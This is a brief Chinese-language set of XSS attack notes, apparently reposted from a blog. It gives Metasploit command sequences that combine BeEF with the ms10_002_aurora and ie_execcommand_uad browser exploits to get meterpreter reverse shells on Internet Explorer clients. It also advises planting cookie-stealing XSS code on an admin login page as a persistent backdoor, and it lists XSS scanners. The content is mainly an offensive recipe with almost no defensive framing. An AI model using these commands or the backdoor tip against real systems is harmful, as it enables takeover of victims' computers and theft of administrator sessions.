网络安全-XSS笔记

XSS绕过限制:
1、绕过magic_quotes_gpc
可使用javascript中的String.fromCharCode()

管理端 Commands Redirect Browser

beef+msf拿客户端shell (ie6 xp)
cd /usr/share/beef-xss 进入目录
./ beef 运行beef
msfconsole 运行msf

msf下执行:
use windows/browser/ms10_002_aurora
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set SRVHOST 客户端将要访问的IP
set SRVPORT 将要访问的端口
set URIPATH / 网站根目录
set LHOST 客户端回连IP
set LPORT 客户端回连端口
exploit

Using URL 为要让客户端访问的url,beef里设置

session -i 查看得到的shell
session -1 id 查看固定id的shell

shell 拿到权限

beef+msf拿客户端shell (ie7、8、9)
msf下
use exploit/windows/browser/ie_execcommand_uad
show options
set SRVHOST 回连ip
set SRVPORT 回连端口
set URIPATH /
exploit

XSS漏洞扫描工具
WVS
椰树
safe3
Xelenium
w3af
vega
xss扫描插件+burp

长期留后门,可将XSS获取cookie代码留在管理登录页面

Xss平台搭建
使用工具:
wamp2.2+xss.me源码

转载于:https://blog.51cto.com/3945465/2140843

你可能感兴趣的:(shell,javascript)